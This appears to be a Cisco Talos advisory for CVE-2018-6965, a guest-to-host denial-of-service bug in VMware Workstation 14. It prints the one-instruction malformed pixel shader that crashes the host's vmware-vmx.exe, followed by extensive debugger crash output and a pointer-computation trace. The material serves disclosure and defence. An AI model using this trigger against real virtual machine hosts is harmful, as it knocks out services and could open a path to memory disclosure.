CVE-2018-6965
An exploitable denial-of-service vulnerability exists in the VMware Workstation 14. A specially crafted pixel shader can cause a read access violation resulting in, at least, denial of service. An attacker can provide a specially crafted shader file (either in binary or text form) to trigger this vulnerability. This vulnerability can be triggered from VMware guest and VMware host, which will be affected (leading to vmware-vmx.exe process crash on host).
VMware Workstation 14 (14.1.1.28517) on Windows 8.1 with Windows 10 x64 as guestVM
6.5 - CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H
CWE-823: Use of Out-of-range Pointer Offset
This vulnerability can be triggered by supplying a malformed pixel shader (in text or binary form) inside a VMware guest operating system. Such attacks can be triggered from VMware guest usermode to cause a memory denial-of-service attack on vmware-vmx.exe process on host. A very simple pixel shader (fragment shader) consisting of only one instruction can trigger this vulnerability.
Pixel shader data used to trigger the bug:
ps_4_0
00000000: 0x000000a4 - 0x000000b8 mov o1.xyzw, r1.xyzw
As you can see, the only instruction in this case is mov (sm4 component-wise move). Please note unlike in typical, valid shader here dcl_input, dcl_output, dcl_temps declarations are missing.
Output from the vmware-vmx-debug.exe process:
--- input ---
ps_4_0
MOV OUTPUT[1].xyzw, TEMP[1].xyzw
FRAG
0: MOV OUT[1], TEMP[1]
1: END
ASSERT bora\mks\hostops\DX11\DX11ShaderTrans.c:85
ASSERT bora\mks\hostops\DX11\DX11ShaderTrans.c:85
PANIC: ASSERT bora\mks\hostops\DX11\DX11ShaderTrans.c:85
Win32 object usage: GDI 12, USER 22
(191c.1180): Unknown exception - code cafebabe (first chance)
CoreDump: Writing minidump to K:\virtual_machines\win10_shader\windows_10_x64_uefi\vmware-vmx-debug.dmp
ModLoad: 00007ffb`da020000 00007ffb`da08c000 C:\Windows\SYSTEM32\verifier.dll
Dumping core for vcpu-0
Panic in progress... ungrabbing
As you can see, vmware-vmx-debug.exe process indicates that the ASSERT macro was triggered (PANIC: (ASSERT bora\mks\hostops\DX11\DX11ShaderTrans.c:85)) due to providing a malformed pixel shader. The entire virtual machine is terminated. The ASSERT macro is only available in DEBUG builds, therefore, this check will be ignored in the retail build (vmware-vmx.exe) leading to crash at:
(1b8c.64): Access violation - code c0000005 (!!! second chance !!!)
*** ERROR: Module load completed but symbols could not be loaded for J:\vmware\x64\vmware-vmx.exe
vmware_vmx+0x308ad0:
00007ff7`fc988ad0 418b38 mov edi,dword ptr [r8] ds:000012d3`485917d0=????????
0:011> r
rax=00000000ffffffff rbx=000000f34856cbf0 rcx=000011dfffffee20
rdx=0000000000000000 rsi=000000f34856d964 rdi=000000f34856def0
rip=00007ff7fc988ad0 rsp=000000f34856c8e0 rbp=000000f34856c9e0
r8=000012d3485917d0 r9=000000f34856c9c0 r10=000000000000000f
r11=000000000000004f r12=000000f34856d958 r13=0000000000000000
r14=000000f34856def0 r15=00007ff7fcf059c0
iopl=0 nv up ei pl nz na pe nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010200
Here is the trace from pointer computation:
0x318AD0: initial r8=0x0000000ae4882af0 r14=0x0000000ae485e030 rcx=0x0000000000000004
0x318AC7: after imul rcx, rax, 11E0h; rcx=0x000011dfffffee20 rax=0x00000000ffffffff
0x318ACA: add r8, rcx; r8=0x000011eae4881910 rcx=0x000011dfffffee20
0x318AD0: reading from @r8=0x000011eae4881910
(133c.1a90): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
vmware_vmx+0x308ad0:
00007ff7`fc988ad0 418b38 mov edi,dword ptr [r8] ds:000011ea`e4881910=????????
In short, it is possible to create a shader in such a way that it will cause invalid pointer calculation. The pointer is later used for read memory operations. This causes access violation due to the pointer being invalid, which results in a denial of service, but could potentially be turned into an information disclosure vulnerability.
0:011> !analyze -v
*******************************************************************************
* *
* Exception Analysis *
* *
*******************************************************************************
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Windows\SYSTEM32\igdusc64.dll -
GetUrlPageData2 (WinHttp) failed: 12007.
DUMP_CLASS: 2
DUMP_QUALIFIER: 0
FAULTING_IP:
vmware_vmx+308ad0
00007ff7`fc988ad0 418b38 mov edi,dword ptr [r8]
EXCEPTION_RECORD: (.exr -1)
ExceptionAddress: 00007ff7fc988ad0 (vmware_vmx+0x0000000000308ad0)
ExceptionCode: c0000005 (Access violation)
ExceptionFlags: 00000000
NumberParameters: 2
Parameter[0]: 0000000000000000
Parameter[1]: 00001263d19515f0
Attempt to read from address 00001263d19515f0
FAULTING_THREAD: 0000089c
DEFAULT_BUCKET_ID: INVALID_POINTER_READ
PROCESS_NAME: vmware-vmx.exe
ERROR_CODE: (NTSTATUS) 0xc0000005 - <Unable to get error code text>
EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - <Unable to get error code text>
EXCEPTION_CODE_STR: c0000005
EXCEPTION_PARAMETER1: 0000000000000000
EXCEPTION_PARAMETER2: 00001263d19515f0
FOLLOWUP_IP:
vmware_vmx+308ad0
00007ff7`fc988ad0 418b38 mov edi,dword ptr [r8]
READ_ADDRESS: 00001263d19515f0
WATSON_BKT_PROCSTAMP: 5a53448e
WATSON_BKT_PROCVER: 14.1.1.28517
PROCESS_VER_PRODUCT: VMware Workstation
WATSON_BKT_MODULE: vmware-vmx.exe
WATSON_BKT_MODSTAMP: 5a53448e
WATSON_BKT_MODOFFSET: 308ad0
WATSON_BKT_MODVER: 14.1.1.28517
MODULE_VER_PRODUCT: VMware Workstation
BUILD_VERSION_STRING: 6.3.9600.17415 (winblue_r4.141028-1500)
MODLIST_WITH_TSCHKSUM_HASH: c658fafa9c6204d32cb9b7029d65df448d2c9b1b
MODLIST_SHA1_HASH: 4a8d1514c2e92391e3c2c084830d5be0b634be75
NTGLOBALFLAG: 0
APPLICATION_VERIFIER_FLAGS: 0
PRODUCT_TYPE: 1
SUITE_MASK: 272
DUMP_TYPE: fe
ANALYSIS_SESSION_HOST: SPLINTER
ANALYSIS_SESSION_TIME: 03-06-2018 10:24:43.0873
ANALYSIS_VERSION: 10.0.15063.468 amd64fre
THREAD_ATTRIBUTES:
OS_LOCALE: PLK
PROBLEM_CLASSES:
ID: [0n292]
Type: [@ACCESS_VIOLATION]
Class: Addendum
Scope: BUCKET_ID
Name: Omit
Data: Omit
PID: [Unspecified]
TID: [0x89c]
Frame: [0] : vmware_vmx
ID: [0n264]
Type: [INVALID_POINTER_READ]
Class: Primary
Scope: DEFAULT_BUCKET_ID (Failure Bucket ID prefix)
BUCKET_ID
Name: Add
Data: Omit
PID: [Unspecified]
TID: [0x89c]
Frame: [0] : vmware_vmx
BUGCHECK_STR: APPLICATION_FAULT_INVALID_POINTER_READ
PRIMARY_PROBLEM_CLASS: APPLICATION_FAULT
LAST_CONTROL_TRANSFER: from 00007ff7fc98a43f to 00007ff7fc988ad0
STACK_TEXT:
00000083`d192c700 00007ff7`fc98a43f : 00000083`d192dd10 00000000`00000000 00000000`00000000 00000000`00000000 : vmware_vmx+0x308ad0
00000083`d192c890 00007ff7`fc9b62f4 : 00000083`d20b1de0 00000083`d192dd10 00000000`00000000 00000000`0002000a : vmware_vmx+0x30a43f
00000083`d192d740 00007ff7`fc97c645 : 00000083`d1975f28 00000000`00000001 00000083`d2167b50 00000000`0000001c : vmware_vmx+0x3362f4
00000083`d192d850 00007ff7`fc8e3518 : 00000000`00000000 00000083`d2157f00 00000000`00000001 00007ff7`fcabb233 : vmware_vmx+0x2fc645
00000083`d197ef40 00007ff7`fc8e4f88 : 00000000`00000000 00007ff7`fd26e600 00000083`d5a2ac20 00000083`d197f340 : vmware_vmx+0x263518
00000083`d197f000 00007ff7`fc8e3a87 : 00000083`d2157f00 00000000`00000006 00000000`00000006 00007ff7`fd26e620 : vmware_vmx+0x264f88
00000083`d197f860 00007ff7`fc8e26f1 : 00000000`00000000 00000000`00000006 00000083`d2157f00 00000000`ffff8000 : vmware_vmx+0x263a87
00000083`d197f8b0 00007ff7`fc84685b : 00000000`00000001 00000083`d197fa30 00000000`00000028 00000083`d2036880 : vmware_vmx+0x2626f1
00000083`d197f8f0 00007ff7`fc7e1cf2 : 00000000`00000001 00000000`00000003 00000083`d197fa30 00000000`00000080 : vmware_vmx+0x1c685b
00000083`d197f930 00007ff7`fc7e00b3 : 00000083`d197fb38 00000000`00000040 00000000`00000000 00000000`00000001 : vmware_vmx+0x161cf2
00000083`d197fab0 00007ff7`fc738070 : 00000083`5033d580 00000000`00000000 00000000`00000001 00000000`00000000 : vmware_vmx+0x1600b3
00000083`d197fae0 00007ff7`fcbc283e : 00000000`0000000b 00007ff7`00000000 00000000`0000000a 00000083`501177b0 : vmware_vmx+0xb8070
00000083`d197fb30 00007ffc`06db13d2 : 00000000`00000000 00007ff7`fcbc2770 00000000`00000000 00000000`00000000 : vmware_vmx+0x54283e
00000083`d197fbc0 00007ffc`08a254f4 : 00007ffc`06db13b0 00000000`00000000 00000000`00000000 00000000`00000000 : KERNEL32!BaseThreadInitThunk+0x22
00000083`d197fbf0 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x34
THREAD_SHA1_HASH_MOD_FUNC: fabc8a15b8308031de6c6f3f3e38f264374c0991
THREAD_SHA1_HASH_MOD_FUNC_OFFSET: f10e48540897893630a7e8de120f464184134145
THREAD_SHA1_HASH_MOD: fe41d85eed2e8932bf60f9b6a3ab05a6ff3dda2e
FAULT_INSTR_CODE: 41388b41
SYMBOL_STACK_INDEX: 0
SYMBOL_NAME: vmware_vmx+308ad0
FOLLOWUP_NAME: MachineOwner
MODULE_NAME: vmware_vmx
IMAGE_NAME: vmware-vmx.exe
DEBUG_FLR_IMAGE_TIMESTAMP: 5a53448e
STACK_COMMAND: ~11s ; kb
FAILURE_BUCKET_ID: INVALID_POINTER_READ_c0000005_vmware-vmx.exe!Unknown
BUCKET_ID: APPLICATION_FAULT_INVALID_POINTER_READ_vmware_vmx+308ad0
FAILURE_EXCEPTION_CODE: c0000005
FAILURE_IMAGE_NAME: vmware-vmx.exe
BUCKET_ID_IMAGE_STR: vmware-vmx.exe
FAILURE_MODULE_NAME: vmware_vmx
BUCKET_ID_MODULE_STR: vmware_vmx
FAILURE_FUNCTION_NAME: Unknown
BUCKET_ID_FUNCTION_STR: Unknown
BUCKET_ID_OFFSET: 308ad0
BUCKET_ID_MODTIMEDATESTAMP: 5a53448e
BUCKET_ID_MODCHECKSUM: 1395bfd
BUCKET_ID_MODVER_STR: 14.1.1.28517
BUCKET_ID_PREFIX_STR: APPLICATION_FAULT_INVALID_POINTER_READ_
FAILURE_PROBLEM_CLASS: APPLICATION_FAULT
FAILURE_SYMBOL_NAME: vmware-vmx.exe!Unknown
WATSON_STAGEONE_URL: http://watson.microsoft.com/StageOne/vmware-vmx.exe/14.1.1.28517/5a53448e/vmware-vmx.exe/14.1.1.28517/5a53448e/c0000005/00308ad0.htm?Retriage=1
TARGET_TIME: 2018-03-06T09:25:24.000Z
OSBUILD: 9600
OSSERVICEPACK: 17415
SERVICEPACK_NUMBER: 0
OS_REVISION: 0
OSPLATFORM_TYPE: x64
OSNAME: Windows 8.1
OSEDITION: Windows 8.1 WinNt SingleUserTS
USER_LCID: 0
OSBUILD_TIMESTAMP: 2014-10-29 03:45:30
BUILDDATESTAMP_STR: 141028-1500
BUILDLAB_STR: winblue_r4
BUILDOSVER_STR: 6.3.9600.17415
ANALYSIS_SESSION_ELAPSED_TIME: 9e88
ANALYSIS_SOURCE: UM
FAILURE_ID_HASH_STRING: um:invalid_pointer_read_c0000005_vmware-vmx.exe!unknown
FAILURE_ID_HASH: {286e64e4-ca0a-1e3c-78f8-4ea042647b09}
Followup: MachineOwner
---------
2018-03-20 - Vendor Disclosure
2018-06-28 - Public Release
Discovered by a member of Cisco Talos